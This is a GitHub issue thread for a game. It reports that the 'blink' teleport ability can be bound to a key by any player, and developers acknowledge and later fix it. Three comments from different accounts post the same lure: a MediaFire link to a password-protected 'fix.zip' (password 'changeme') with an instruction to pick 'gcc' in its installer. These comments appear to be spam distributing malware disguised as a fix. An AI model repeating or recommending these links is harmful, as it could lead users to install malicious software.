### ISSUE TITLE
Blink can be bound (at all)

### ISSUE THREAD

**Issue by polikilopl** [Eggs-D-Studios/wos-issues#270]
### Guidelines

- [X] I checked for duplicate bug reports
- [X] I tried to find a way to reproduce the bug

### Version

Main (Production)

### What happened? What did you expect to happen?

i really dont need to describe this lol, the gif shows everything you need to know.
the fact this is in stable is uncanny
![G6mbYdAh8KwmQxLecNEi1Ja4](https://github.com/user-attachments/assets/fefb3088-6c8a-4428-a441-0841e4f03b9d)

### How can we reproduce this bug?

1. go to starter planet
2. type "/bind e blink"
3. free teleportation anywhere you go!

### Frequency

Always

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SPECTERIN** [comment]
please stop reporting useful bugs

**Comment by Hexcede** [comment]
> please stop reporting useful bugs

I already knew about this issue I just haven't gotten around to fixing it lol.

**Comment by GooberGoonie** [comment]
> > please stop reporting useful bugs
> 
> I already knew about this issue I just haven't gotten around to fixing it lol.

that sucks

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NameTemplate** [comment]
It isn't that bind bypasses permission, but that blink is able to be used by anyone... for some reason...

**Comment by NameTemplate** [comment]
This appears to have been fixed.
